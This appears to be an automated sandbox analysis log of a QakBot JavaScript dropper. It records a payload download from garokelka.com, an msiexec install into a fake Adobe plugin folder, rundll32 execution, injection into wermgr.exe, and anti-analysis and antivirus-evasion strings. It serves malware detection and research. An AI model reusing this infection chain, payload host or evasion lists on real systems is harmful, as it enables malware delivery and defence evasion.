            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: unknownTCP traffic detected without corresponding DNS query: 103.144.201.48
            Source: P96VU3JU.htm.5.drString found in binary or memory: <a class="fw-c-footer__social-channel --channel-facebook" href="https://www.facebook.com/Cisco/" title="Facebook" data-config-metrics-item="Facebook"> equals www.facebook.com (Facebook)
            Source: P96VU3JU.htm.5.drString found in binary or memory: <a class="fw-c-footer__social-channel --channel-linkedin" href="https://www.linkedin.com/company/cisco" title="LinkedIn" data-config-metrics-item="LinkedIn"> equals www.linkedin.com (Linkedin)
            Source: P96VU3JU.htm.5.drString found in binary or memory: <a class="fw-c-footer__social-channel --channel-youtube" href="https://www.youtube.com/user/cisco" title="YouTube" data-config-metrics-item="YouTube"> equals www.youtube.com (Youtube)
            Source: P96VU3JU.htm.5.drString found in binary or memory: http://cdn.appdynamics.com
            Source: P96VU3JU.htm.5.drString found in binary or memory: http://pdx-col.eum-appdynamics.com
            Source: P96VU3JU.htm.5.drString found in binary or memory: http://schema.org/ImageObject
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://blogs.cisco.com/networking/it-leaders-contend-with-secure-multicloud-access-the-2023-global-
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://blogs.cisco.com/security/now-is-the-time-to-step-up-your-security?utm_medium=web-referral&ut
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://cdn.appdynamics.com
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://ciscocx.qualtrics.com/jfe/form/SV_0Tcp9VU8pUm4lBY?Ref&#61;/c/en/us/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://community.cisco.com/
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://duo.com/solutions/risk-based-authentication?utm_medium=web-referral&utm_source=cisco#eyJoYXN
            Source: 6781be.rbs.1.dr, MSI81ED.tmp.1.drString found in binary or memory: https://garokelka.com/
            Source: 6781be.rbs.1.drString found in binary or memory: https://garokelka.com/$
            Source: wscript.exe, 00000000.00000002.377798248.000001DCD5B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377308183.000001DCD5B4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377028906.000001DCD5B8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377167880.000001DCD5B4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.377814075.000001DCD5B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377497502.000001DCD5B8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377614513.000001DCD5B4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377394536.000001DCD5B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377028906.000001DCD5B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377268912.000001DCD5B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.377829397.000001DCD5B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garokelka.com/rlvoq0.msi
            Source: ~DFD56E4E9B73156A44.TMP.1.dr, inprogressinstallinfo.ipi.1.dr, ~DFC8411CD743E6CADD.TMP.1.dr, ~DFAAF580DC072508D1.TMP.1.dr, ~DFEA98AB2A043532AC.TMP.1.dr, ~DFCFA0FDA4AEF3B850.TMP.1.drString found in binary or memory: https://garokelka.com/rlvoq0.msi0C:
            Source: ~DF0DDEAC6C9405E7E5.TMP.1.drString found in binary or memory: https://garokelka.com/rlvoq0.msi457110176310365940
            Source: wscript.exe, 00000000.00000002.377798248.000001DCD5B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377308183.000001DCD5B4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377167880.000001DCD5B4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.377614513.000001DCD5B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://garokelka.com/rlvoq0.msif:randomM
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://learninglocator.cloudapps.cisco.com/#/home
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m05/cisco-launches-program-for-customers-and-p
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://newsroom.cisco.com/c/r/newsroom/en/us/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://pdx-col.eum-appdynamics.com
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://search.cisco.com/search?query=
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://software.cisco.com/download/navigator.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://twitter.com/Cisco/
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/ar_ae/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/ar_eg/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/cs_cz/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/da_dk/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/dam/en_us/about/supply-chain/cisco-modern-slavery-statement.pdf
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/de_at/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/de_ch/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/accessibility.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/careers.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/contact-cisco.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/help.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/terms-conditions.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/trademarks.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/about/sitemap.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/buy.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/partners/connect-with-a-partner.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/solutions/design-zone.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/solutions/service-provider/routed-optical-networking/index.html?ccid=c
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/training-events/events.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en/us/training-events/training-certifications.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_ae/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_be/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_dz/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_eg/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_hk/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_id/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_il/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_my/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_ph/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_sg/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/en_za/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_ar/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_bz/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_cl/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_co/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_cr/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_ec/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_es/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_mx/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_pa/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/es_pe/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/fr_be/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/fr_ch/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/fr_dz/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/hu_hu/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/it_it/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/ko_kr/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/m/en_us/solutions/hybrid-work/workplace-solutions/penn1-lookbook.html?ccid=c
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/nl_be/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/nl_nl/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/no_no/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/pl_pl/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/pt_br/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/pt_pt/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/ro_ro/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/ru_ru/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/ru_ua/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/sv_se/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/th_th/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/tr_tr/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/uk_ua/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/vi_vn/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/zh_hk/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/c/zh_tw/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/au/en/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/ca/en/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/ca/fr/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/cn/zh/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/de/de/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/fr/fr/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/in/en/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/jp/ja/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/uk/en/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/site/us/en/index.html
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.cisco.com/web/fw/i/logo-open-graph.gif
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.ciscolive.com/global.html?CID=cdchp&TEAM=global_events&MEDIUM=digital_direct&CAMPAIGN=bt
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.instagram.com/cisco/
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.linkedin.com/company/cisco
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.schema.org
            Source: P96VU3JU.htm.5.drString found in binary or memory: https://www.youtube.com/user/cisco
            Source: unknownDNS traffic detected: queries for: garokelka.com
            Source: global trafficHTTP traffic detected: GET /rlvoq0.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: garokelka.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cisco.comCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 217.195.153.225:443 -> 192.168.2.3:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 72.163.4.185:443 -> 192.168.2.3:49703 version: TLS 1.2
            Source: 4.2.rundll32.exe.570000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 4.2.rundll32.exe.490910.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 4.2.rundll32.exe.490910.0.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\6781bf.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI980.tmpJump to behavior
            Source: ProjectFunding_450726_Jun01.jsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeSection loaded: tsappcmp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ProjectFunding_450726_Jun01.js"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPluginJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF0DDEAC6C9405E7E5.TMPJump to behavior
            Source: classification engineClassification label: mal80.troj.evad.winJS@10/19@3/100
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{0B9A111B-3DAA-44E4-979C-E81B594B3141}
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{01003F32-6F92-4FBC-A23F-AA62F8309346}
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{0B9A111B-3DAA-44E4-979C-E81B594B3141}
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs
            Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.385452073.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
            Source: Binary string: ExtendScript.pdb source: rundll32.exe, 00000004.00000002.385452073.000000001006A000.00000002.00000001.01000000.00000006.sdmp, main.dll.1.dr
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1005C675 push ecx; ret
            Source: main.dll.1.drStatic PE information: real checksum: 0xc399f should be: 0xc477b
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7284 base: 103C50 value: E9 63 D7 15 03
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wermgr.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE(
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE0
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE/
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE(
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE&
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE(
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE.
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wermgr.exe, 00000005.00000003.385199064.0000000004FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
            Source: C:\Windows\System32\msiexec.exe TID: 5628Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7256Thread sleep count: 193 > 30
            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.6 %
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100559A0 GetVersionExA,GetVersionExA,GetVersionExA,GetSystemInfo,
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1005C09A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100379BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1005C09A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wermgr.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100060D0 lgetVersion@Engine@ScScript@@SAHXZ,lgetStackTrace@DebugAPI@ScScript@@QBE?AVString@ScCore@@HH@Z,lgetName@Engine@ScScript@@QBEABVString@ScCore@@XZ,
            Source: rundll32.exe, 00000004.00000003.377138996.0000000000E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
            Source: rundll32.exe, 00000004.00000003.377138996.0000000000E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
            Source: rundll32.exe, 00000004.00000003.377138996.0000000000E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
            Source: rundll32.exe, 00000004.00000003.377138996.0000000000E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
            Source: rundll32.exe, 00000004.00000003.377138996.0000000000E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: rundll32.exe, 00000004.00000003.377138996.0000000000E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 4.2.rundll32.exe.570000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.rundll32.exe.490910.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.rundll32.exe.490910.0.unpack, type: UNPACKEDPE
